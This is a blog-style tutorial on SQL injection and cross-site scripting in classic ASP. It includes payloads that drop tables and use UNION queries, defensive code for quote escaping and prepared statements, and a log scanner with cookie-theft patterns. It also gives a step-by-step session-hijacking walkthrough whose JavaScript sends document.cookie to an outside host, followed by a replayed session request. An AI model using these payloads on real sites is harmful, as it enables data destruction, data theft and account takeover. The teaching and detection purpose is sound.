Monday, July 5, 2010

Web Application Security : SQL Injection and Attack Demonstration

2. SQL Injection
Now to the more dangerous part: SQL injection. This is a technique which allows
the attacker to execute malicious SQL statements. With the help of xp_cmdshell
it's even possible to execute system commands if the database is accessed as 'sa'.
This bug exists whenever you use unvalidated data submitted by the client to
perform a database query. Let's take this SQL statement, where the string "TERM"
can be submitted by the visitor.

    SELECT NewsId, NewsTitle
    FROM T_News
    WHERE NewsTitle LIKE '%TERM%'

The client could craft the term to drop the table T_News:

    SELECT NewsId, NewsTitle
    FROM T_News
    WHERE NewsTitle LIKE '%';
    DROP TABLE T_News --'

Yes, this is possible. Just submit '; DROP TABLE T_News -- as the search term.
First the WHERE clause is closed with the single quote, and then we can start the
next statement with the semicolon. The two dashes at the end start a comment,
so the single quote which the developer has inserted after the user's input doesn't
produce a syntax error.
It's also possible to select any other data and display it instead of the news
the developer wanted to display on this page. You can use the UNION statement for
that. The only requirement is that both queries return the same number of columns
and the same data type in each column. If necessary, use CONVERT to achieve that.
[1] shows a trick for finding out how many rows are included in the query
using the HAVING clause. One example of a UNION attack:

    SELECT NewsId, NewsTitle
    FROM T_News
    WHERE NewsTitle LIKE '%DOESNOTEXIST'
    UNION SELECT UserId, UserName
    FROM T_User --%'


2.1 Protection: Approach I

Filter characters
Luckily this attack is much easier to protect against than cross-site scripting. Make
sure to remove or escape all single quotes in string parameters. Additionally, enforce
that any numeric input is really numeric using the IsNumeric function call. The
ASP functions (see section 4.2) include some generic functions that protect you from
SQL injection attacks if you use them every time. The numeric and date functions
check that the input data is valid and then explicitly convert it with CInt, CLng,
CDate, etc.

2.2 Protection: Approach II

ADODB Command
There is another approach which is very safe but more work to implement [12].
You can use ADODB prepared statements to automatically sanitize the data. See
appendix D for an example.
Please note that in the example I have checked the numeric parameters. This
isn't strictly required, but if you leave it out you get some nasty error messages:
"Application uses a value of the wrong type for the current operation."
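To see the injection from section 2 and both protection approaches side by side, here is an added example (not from the original post, and not the ASP code from appendix D). It rebuilds the T_News and T_User tables in an in-memory SQLite database (constructed sample rows, SQL Server in the original), runs the page's UNION payload through a query built by string concatenation, through one with single quotes doubled (Approach I), and through a prepared statement with a bound parameter (Approach II), and shows the IsNumeric/CInt-style check for numeric parameters. The table contents and the `?` placeholder syntax are assumptions of this example.

```python
import sqlite3

# Constructed in-memory stand-in for the T_News / T_User tables in the text.
# (SQL Server in the original; SQLite here so the example runs anywhere.)
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE T_News (NewsId INTEGER, NewsTitle TEXT);
        INSERT INTO T_News VALUES (1, 'Site launched'), (2, 'Maintenance window');
        CREATE TABLE T_User (UserId INTEGER, UserName TEXT);
        INSERT INTO T_User VALUES (7, 'admin'), (8, 'alice');
    """)
    return conn


def search_vulnerable(conn, term):
    """The page's query with TERM concatenated straight into the SQL text."""
    sql = "SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_escaped(conn, term):
    """Approach I: double every single quote so the input cannot close the literal."""
    escaped = term.replace("'", "''")
    sql = "SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE '%" + escaped + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Approach II: a prepared statement; the driver passes the term as data, not SQL."""
    sql = "SELECT NewsId, NewsTitle FROM T_News WHERE NewsTitle LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def news_by_id(conn, raw_id):
    """Numeric input: check it is numeric (IsNumeric), convert explicitly (CInt), bind it."""
    if not raw_id.strip().isdigit():
        raise ValueError("NewsId must be numeric: %r" % raw_id)
    return conn.execute(
        "SELECT NewsId, NewsTitle FROM T_News WHERE NewsId = ?", (int(raw_id),)
    ).fetchall()


# The UNION payload from the text. The stacked "'; DROP TABLE" payload would run
# on SQL Server, but sqlite3's execute() refuses a second statement, so the UNION
# form is the one that shows the difference here.
UNION_PAYLOAD = "DOESNOTEXIST' UNION SELECT UserId, UserName FROM T_User --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, UNION_PAYLOAD))  # user table leaks
    print("escaped:   ", search_escaped(db, UNION_PAYLOAD))     # no rows
    print("prepared:  ", search_safe(db, UNION_PAYLOAD))        # no rows
    print("numeric:   ", news_by_id(db, "1"))
```

With the concatenated query the result set is the user table; with quotes doubled or a bound parameter the payload is just an unusual search term that matches nothing. The numeric check rejects anything that is not digits before it gets near the query, which is the same order of operations (validate, then convert, then use) that the ASP functions in section 4.2 follow.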


3. Attack Demonstration

This is how a cross-site scripting attack could take place. It demonstrates
how to steal a cookie.
For the session handling, IIS sets a cookie named "ASPSESSION...". It's quite
impossible to guess the name and the value. But it's possible to steal this cookie.
When you get a SessionID you can pass it to the server and then you own that
session. I'll give you a step by step guide.

3.0.1 Set up/look for a page to log cookies
You first have to get some possibility to log the stolen cookies. This may be an ASP
page on your own server that logs the query string to a file. Another possibility
would be to use the query string needed to create an entry in some guestbook. Let's
assume the URL to create a guestbook entry is
http://some.host/xtgbadd.asp?user=cookie&msg=MESSAGE

3.0.2 Create a JavaScript
Next you need to create a script to inject. This should redirect to the URL researched
above, inserting the message. For example:

    <script>
    location.href='http://some.host/xtgbadd.asp?user=cookie&msg=' + document.cookie
    </script>

3.0.3 Inject the script
Now inject the created script into the targeted page. For example you could inject
it into a session-based ASP forum or guestbook.

3.0.4 Break the session
I assume you had at least one victim. Get the cookie from your log file (or wherever
it is stored) and extract the ASPSESSIONID cookie. For example:
ASPSESSIONIDGQGGGHRP=INGFOODCHEIDAHKMKNKJHAMK
Then you connect to the Web server and send this request. (End with two
newlines.)

    GET /$TARGETSITE HTTP/1.1
    Host: $WEBSERVER
    Connection: Close
    Cookie: ASPSESSIONIDGQGGGHRP=INGFOODCHEIDAHKMKNKJHAMK
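The two places a site owner can stop the walkthrough above are step 3.0.3 (the guestbook writes the submitted script into the page unencoded) and step 3.0.1 (the stolen cookie shows up in the server log of whatever page was used to collect it). The following is an added example, not part of the original post: it HTML-encodes guestbook fields before they are rendered, so an injected `<script>` is displayed as text, and it scans IIS-style W3C log lines for the tell-tale query strings. The log lines are constructed for this example, the log field order is assumed, and the cookie pattern is assumed from the shape of the sample cookie in 3.0.4 (ASPSESSIONID, eight letters, `=`, twenty-four letters).

```python
import html
import re
from urllib.parse import unquote_plus


# Hardening for the injection step (3.0.3): encode guestbook fields before they
# are written into the page, so a submitted <script> is displayed, not executed.
def render_entry(user, msg):
    return "<p><b>%s</b>: %s</p>" % (html.escape(user, quote=True),
                                     html.escape(msg, quote=True))


# Assumed from the sample cookie in 3.0.4: ASPSESSIONID + 8 letters = 24 letters.
SESSION_COOKIE = re.compile(r"ASPSESSIONID[A-Z]{8}=[A-Z]{24}")


def classify_query(query):
    """Return why a URL-encoded query string looks like cookie theft, or None."""
    decoded = unquote_plus(query)
    if SESSION_COOKIE.search(decoded):
        return "session cookie in query string"
    lowered = decoded.lower()
    if "<script" in lowered or "document.cookie" in lowered:
        return "script injection in query string"
    return None


def find_cookie_exfil(log_lines):
    """Scan W3C-style IIS log lines (date time c-ip method uri-stem uri-query status).

    Returns (client ip, uri-stem, reason) for every suspicious request.
    """
    hits = []
    for line in log_lines:
        if line.startswith("#"):
            continue  # W3C directive/header lines
        fields = line.split()
        if len(fields) < 7:
            continue
        client_ip, uri_stem, uri_query = fields[2], fields[4], fields[5]
        reason = classify_query(uri_query)
        if reason:
            hits.append((client_ip, uri_stem, reason))
    return hits


# Constructed sample log, not taken from any real server; field order assumed.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2010-07-05 10:00:01 192.0.2.10 GET /xtgbadd.asp user=bob&msg=hello 200",
    "2010-07-05 10:00:02 192.0.2.11 GET /xtgbadd.asp "
    "user=cookie&msg=ASPSESSIONIDGQGGGHRP%3DINGFOODCHEIDAHKMKNKJHAMK 200",
    "2010-07-05 10:00:03 192.0.2.12 GET /guestbook.asp "
    "msg=%3Cscript%3Elocation.href%3D%27http%3A%2F%2Fsome.host%2F%27%2Bdocument.cookie%3C%2Fscript%3E 200",
    "2010-07-05 10:00:04 192.0.2.13 GET /news.asp term=launch 200",
]

if __name__ == "__main__":
    print(render_entry("eve", "<script>alert(1)</script>"))
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print("suspicious request:", hit)
```

Encoding on output is what makes step 3.0.3 fail: the browser receives `&lt;script&gt;` and shows it as text. The log scan is a cheap after-the-fact check; the second and third sample lines are flagged, the ordinary guestbook post and the news search are not. Any request flagged with a session cookie in its query string is also a reason to invalidate that session on the server, since the cookie has by then left the victim's browser.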
